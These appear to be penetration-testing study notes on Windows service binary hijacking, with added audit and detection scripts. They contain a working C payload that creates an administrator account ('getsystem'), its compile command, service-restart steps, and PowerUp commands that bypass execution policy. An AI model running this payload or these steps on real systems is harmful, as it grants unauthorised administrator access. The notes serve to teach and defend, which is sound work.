Service Binary Hijacking
We start PowerShell and use Get-CimInstance to query the WMI class win32_service. We are interested in the name, state, and binary path of each service, so we pipe the result to Select with the arguments Name, State, and PathName, and then filter out any service that is not in the Running state with Where-Object.
When using a network logon such as WinRM or a bind shell, Get-CimInstance and Get-Service return a "permission denied" error when a non-administrative user queries services. Using an interactive logon such as RDP avoids this problem.
PS C:\Users\root> Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
Name State PathName
---- ----- --------
AppXSvc Running C:\Windows\system32\svchost.exe -k wsappx -p
AudioEndpointBuilder Running C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p
Audiosrv Running C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
BFE Running C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
BrokerInfrastructure Running C:\Windows\system32\svchost.exe -k DcomLaunch -p
BTAGService Running C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
BthAvctpSvc Running C:\Windows\system32\svchost.exe -k LocalService -p
bthserv Running C:\Windows\system32\svchost.exe -k LocalService -p
camsvc Running C:\Windows\system32\svchost.exe -k appmodel -p
CDPSvc Running C:\Windows\system32\svchost.exe -k LocalService -p
ClipSVC Running C:\Windows\System32\svchost.exe -k wsappx -p
COMSysApp Running C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
CoreMessagingRegistrar Running C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
CryptSvc Running C:\Windows\system32\svchost.exe -k NetworkService -p
icacls and Get-ACL
icacls permission masks:
F   Full access
M   Modify access
RX  Read and execute access
R   Read-only access
W   Write-only access
PS C:\Users\root> icacls C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe NT SERVICE\TrustedInstaller:(F)
BUILTIN\Administrators:(RX)
NT AUTHORITY\SYSTEM:(RX)
BUILTIN\Users:(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(RX)
Successfully processed 1 files; Failed processing 0 files
PS C:\Users\root> get-acl C:\Windows\system32\svchost.exe
    Directory: C:\Windows\system32
Path        Owner                        Access
----        -----                        ------
svchost.exe NT SERVICE\TrustedInstaller  NT AUTHORITY\SYSTEM Allow  ReadAndExecute, Synchronize...
Example
PS C:\Users\root> icacls "C:\xampp\mysql\bin\mysqld.exe"
C:\xampp\mysql\bin\mysqld.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
Successfully processed 1 files; Failed processing 0 files
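The two checks above (enumerate running services, then inspect the ACL of each service binary with icacls or Get-ACL) can be combined into one audit that flags any running service whose executable grants write, modify or full control to a low-privileged principal. The script below is an added example written for these notes; it is not part of the original page or of PowerUp. The list of low-privileged principals and the set of rights treated as "can replace the file" are assumptions chosen for the audit, and it expects an interactive logon, as the notes explain, so that Get-CimInstance can query services.

```powershell
# Added audit example (not from the original notes): report running services whose
# executable can be modified by low-privileged principals.
# Assumption: run from an interactive logon so Get-CimInstance can query win32_service.

# Principals that should never hold write rights on a service binary (assumed list).
$LowPrivPrincipals = @(
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE',
    'Everyone'
)

# Any of these rights lets a caller replace or alter the file (assumed set).
$WriteRights = [System.Security.AccessControl.FileSystemRights]::Write -bor
               [System.Security.AccessControl.FileSystemRights]::Modify -bor
               [System.Security.AccessControl.FileSystemRights]::FullControl -bor
               [System.Security.AccessControl.FileSystemRights]::WriteData -bor
               [System.Security.AccessControl.FileSystemRights]::TakeOwnership -bor
               [System.Security.AccessControl.FileSystemRights]::ChangePermissions

function Get-ServiceBinaryPath([string]$PathName) {
    # PathName may carry arguments, e.g. C:\Windows\system32\svchost.exe -k wsappx -p
    # Quoted path: take what sits between the first pair of quotes.
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    # Unquoted path: cut at the first ".exe" token (-match is case-insensitive).
    if ($PathName -match '^\s*(.*?\.exe)(\s|$)') { return $Matches[1] }
    return ($PathName -split '\s+')[0]
}

function Test-WeakServiceBinaryAcl([string]$Path) {
    # Return one object per Allow ACE that gives a low-privileged principal write rights.
    $findings = @()
    if (-not (Test-Path -LiteralPath $Path)) { return $findings }
    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $id = $ace.IdentityReference.Value
        if (($LowPrivPrincipals -contains $id) -and
            (($ace.FileSystemRights -band $WriteRights) -ne 0)) {
            $findings += [pscustomobject]@{ Principal = $id; Rights = $ace.FileSystemRights }
        }
    }
    return $findings
}

# Same enumeration as in the notes, followed by the ACL check on each binary.
Get-CimInstance -ClassName win32_service |
    Where-Object { $_.State -eq 'Running' } |
    ForEach-Object {
        $svc = $_
        $bin = Get-ServiceBinaryPath $svc.PathName
        if (-not $bin) { return }
        foreach ($f in Test-WeakServiceBinaryAcl $bin) {
            [pscustomobject]@{
                Service   = $svc.Name
                Binary    = $bin
                Principal = $f.Principal
                Rights    = $f.Rights
            }
        }
    } | Format-Table -AutoSize
```

An empty table means no running service binary is writable by the assumed low-privileged groups; the mysqld.exe example above, which grants (F) only to SYSTEM and Administrators, would not appear. The audit only looks at the groups in $LowPrivPrincipals, so a binary writable by a specific non-admin user account is not reported unless that account is added to the list.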
Example Payload
#include <stdlib.h>
int main()
{
    int i;
    /* runs as the service account (SYSTEM) when the service starts this binary */
    i = system("net user getsystem getsystem /add");
    i = system("net localgroup administrators getsystem /add");
    return 0;
}
Cross-compile for 64-bit Windows with mingw-w64:
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
Example
net stop mysql
sc start mysql
sc qc mysql
PS C:\Users\root> Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}
shutdown /r /t 0
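From the defender's side, the replacement of a service binary followed by a restart or reboot is visible as a change in the executable behind a service. The script below is an added detection example for these notes, not part of the original page or of any tool it mentions: it snapshots the SHA256 hash and Authenticode status of every service executable, and a later comparison reports binaries that changed, appeared or disappeared. The baseline file location is an assumed, constructed path.

```powershell
# Added detection example (not from the original notes): baseline and compare the
# executables behind installed services. A swapped service binary, like the mysqld.exe
# replacement described above, shows up as "binary changed" on the next comparison.
$BaselinePath = 'C:\ProgramData\ServiceBinaryBaseline.json'   # assumed location

function Get-ServiceBinaryPath([string]$PathName) {
    # Quoted path: take what sits between the first pair of quotes; otherwise cut at ".exe".
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^\s*(.*?\.exe)(\s|$)') { return $Matches[1] }
    return ($PathName -split '\s+')[0]
}

function Get-ServiceBinarySnapshot {
    # One object per installed service whose executable exists on disk.
    Get-CimInstance -ClassName win32_service | ForEach-Object {
        $bin = Get-ServiceBinaryPath $_.PathName
        if ($bin -and (Test-Path -LiteralPath $bin)) {
            [pscustomobject]@{
                Service = $_.Name
                Binary  = $bin
                Sha256  = (Get-FileHash -LiteralPath $bin -Algorithm SHA256).Hash
                Signed  = ((Get-AuthenticodeSignature -LiteralPath $bin).Status -eq 'Valid')
            }
        }
    }
}

function Save-ServiceBinaryBaseline {
    # Run once on a known-good host; the file becomes the reference for later comparisons.
    Get-ServiceBinarySnapshot | ConvertTo-Json | Set-Content -LiteralPath $BaselinePath
}

function Compare-ServiceBinaryBaseline {
    # Emit one object per service whose executable changed, is new, or was removed.
    $old = @{}
    foreach ($e in (Get-Content -LiteralPath $BaselinePath -Raw | ConvertFrom-Json)) {
        $old[$e.Service] = $e
    }
    foreach ($e in Get-ServiceBinarySnapshot) {
        $prev = $old[$e.Service]
        if (-not $prev) {
            [pscustomobject]@{ Service = $e.Service; Binary = $e.Binary; Change = 'new service'; Signed = $e.Signed }
            continue
        }
        if ($prev.Sha256 -ne $e.Sha256 -or $prev.Binary -ne $e.Binary) {
            [pscustomobject]@{ Service = $e.Service; Binary = $e.Binary; Change = 'binary changed'; Signed = $e.Signed }
        }
        $old.Remove($e.Service)
    }
    foreach ($k in $old.Keys) {
        [pscustomobject]@{ Service = $k; Binary = $old[$k].Binary; Change = 'service removed'; Signed = $null }
    }
}

# Usage: Save-ServiceBinaryBaseline once, then run Compare-ServiceBinaryBaseline on a
# schedule and alert on any output.
```

Legitimate updates also change hashes, so a "binary changed" entry needs triage rather than an automatic alert; the Signed column helps here, since a replacement compiled with mingw as above carries no valid Authenticode signature, although third-party binaries such as the XAMPP mysqld.exe may be unsigned to begin with.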
Using PowerUp.ps1
PS C:\Users\root> powershell -ep bypass
PS C:\Users\root> . .\PowerUp.ps1
PS C:\Users\root> Invoke-AllChecks
or
PS C:\Users\root> Get-ModifiableServiceFile
PS C:\Users\root> Install-ServiceBinary -Name 'mysql'
or
PS C:\Users\root> $ModifiableFiles = echo 'C:\xampp\mysql\bin\mysqld.exe' | Get-ModifiablePath -Literal
PS C:\Users\root> $ModifiableFiles